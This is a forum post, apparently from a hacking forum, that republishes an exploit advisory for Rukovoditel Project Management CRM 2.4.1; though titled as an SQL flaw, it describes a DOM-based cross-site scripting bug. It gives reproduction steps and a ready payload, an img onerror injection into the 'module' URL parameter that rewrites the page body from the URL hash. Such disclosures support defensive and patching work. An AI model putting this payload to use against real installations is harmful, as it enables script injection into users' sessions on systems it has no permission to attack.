Rukovoditel PRM-CRM 2.4.1 SQL Vuln.
by Adient - May 30, 2019 at 10:54 PM
#1
####################################################################


# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : ADİENT
# Team : TURKHACK
# Date : 29/01/2019
# Vendor Homepage : https://www.rukovoditel.net/
# Software Link : https://sourceforge.net/projects/rukovoditel/
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
# https://cxsecurity.com/issue/WLB-2019010288
# Sofrware Descr*iption : Rukovoditel is a free web-based open-source project management 
application. A far cry from traditional applications, Rukovoditel gives 
users a broader and extensive approach to project management. Its 
customization options allow users to create additional entities, modify 
and specify the relationship between them, and generate the necessary reports. 

####################################################################

# Impact :
*********

* This web application called as Rukovoditel Project Management CRM 2.4.1 version.
* first of all, delete the value string from the URL (...module=users%2flogin)
* after, add the XSS code I‘ve given below to the end of the URL.
* The proof will be the picture below.
* https://i.hizliresim.com/6aydM7.jpg

####################################################################

# PoC :
****************************
* XSS Code : " gt; lt;img src=x onerror=document.body.innerHTML=location.hash gt;#" gt; lt;img src=x onerror=prompt(123456789) gt;
* Value : users%2flogin
* Get Request : http://localhost/[PATH]/index.php?module=users%2flogin
* URL : http://localhost/rukovoditel/index.php?module=" gt; lt;img src=x onerror=document.body.innerHTML=location.hash gt;#" gt; lt;img src=x onerror=prompt(123456789) gt;

####################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Stimarine Xss vuln Adient 0 86 August 26, 2019 at 09:01 PM
Last Post: Adient
Karenderia CMS 5.3 - Multiple SQL Vuln. Adient 0 137 July 25, 2019 at 07:44 PM
Last Post: Adient
Newsbull Haber Script O.Redirect Vuln. Adient 0 115 July 17, 2019 at 04:36 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)